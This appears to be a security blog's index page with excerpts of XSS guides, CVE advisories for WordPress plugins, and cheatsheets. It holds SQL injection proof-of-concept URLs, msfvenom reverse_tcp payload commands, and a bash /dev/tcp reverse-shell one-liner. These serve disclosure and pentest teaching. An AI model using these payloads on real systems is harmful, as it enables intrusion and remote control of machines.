During a penetration testing we may face some input sanitisation issues that can lead to various XSS attacks. However, many times we are not able to trigger these issues and perform an attack with an actual impact. For example, we may find an XSS on a submit form which sends the user’s data with POST requests. Moreover, these data are…
Guide: Cross-Site Scripting (XSS) Evasion Techniques – Part 2
After sorting out the basic concepts in Part 1, I think it’s time to continue with more complicated techniques. Our main area of focus will be the evasion of misconfigured Anti-XSS modules. In case the web application forbids the character “/” and the payload is reflected into the HTML document we can use an HTML tag which does not have…
Guide: Cross-Site Scripting (XSS) Basic Exploitation Techniques – Part 1
Disclaimer: This is not an advanced guide for the discovery and mitigation of Cross-Site Scripting (hereinafter XSS). It is just a beginner’s guide in XSS with the goal to mitigate common client side injection attacks. We will have a second post regarding advanced XSS attacks but for now we need to build from the ground up. Of course, everything described…
CVE-2017-9419: WordPress WP Custom Fields Search v.0.3.28 Reflected Cross-Site Scripting (XSS)
Identification Date: 11/06/2017 Vendor Homepage: http://www.webhammer.co.uk/wordpress#tab-wp-custom-fields-search Software Link: http://wordpress.org/plugins/wp-custom-fields-search/ Description This version of the WP Custom Fields Search plug-in is vulnerable to a Reflected Cross-Site Scripting vulnerability in the “cs-all-0” parameter due to the lack of proper input handling of the user’s data. An attacker can execute arbitrary JavaScript using a specially crafted URL. Thus, when the victim clicks…
CVE-2017-9429: Event List Version v.0.7.8 Blind Based SQL Injection (SQLi)
Identification Date: 04/06/2017 Vendor Homepage: https://profiles.wordpress.org/mibuthu Software Link: https://wordpress.org/plugins/event-list/ An authenticated user can can exploit this vulnerability by editing an event. Each event has an id parameter which is not properly sanitized. An attacker cans exploit the vulnerable parameter and execute arbitrary SQL queries using blind based SQL injection. Proof of Concept In order to replay the attack, use the…
CVE-2017-9603: WordPress WP Jobs v.1.4 SQL Injection (SQLi)
Identification Date: 11/06/2017 Vendor Homepage: http://www.intensewp.com/ Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/ Description SQL injection vulnerability in the WP Jobs plug-in 1.4 for WordPress allows an authenticated user to execute arbitrary SQL commands via the jobid parameter. Proof of Concept In order to replay the attack, use the link below. http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL– comment The results of the SQL injection are…
CVE-2017-9418: WP-Testimonials WordPress Plugin v.3.4.1 Union Based SQL Injection (SQLi)
Identification Date: 02/06/2017 Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/ Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/ Description SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows to an authenticated user to execute arbitrary SQL commands via the testid parameter. Proof of Concept A Proof of Concept code is provided below. http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedit&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL– comment The results of the SQL injection are being reflected in…
Cheatsheet: Metasploit Payloads
Windows You can use the following command in order to create an EXE file for a Windows machine. msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f exe > shell.exe Linux In order to gain access to a Linux host, an ELF file must be created. You can use the following line for that. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port]…
Cheatsheet: Reverse Shells
Bash When we don’t have any other third party tool to get a reverse shell back, we can always redirect the Bash into our host using the following command. bash -i >& /dev/tcp/[Your IP]/[Your Port] 0>&1 Python When we want to get a reverse shell on Linux, we can do it by abusing the interpreters which come with the Operating…
CVE-2017-9420: WordPress Spiffy Calendar v.3.2.0 Reflected Cross-Site Scripting (XSS)
Identification Date: 02/06/2017 Vendor Homepage: http://spiffycalendar.sunnythemes.com/ Software Link: https://wordpress.org/plugins/spiffy-calendar Description This version of the Spiffy Calendar plug-in is vulnerable to a Reflected Cross-Site Scripting vulnerability in the “yr” parameter due to the lack of proper input handling of the user’s data. An attacker can execute arbitrary JavaScript using a specially crafted URL. Thus, when the victim clicks on the…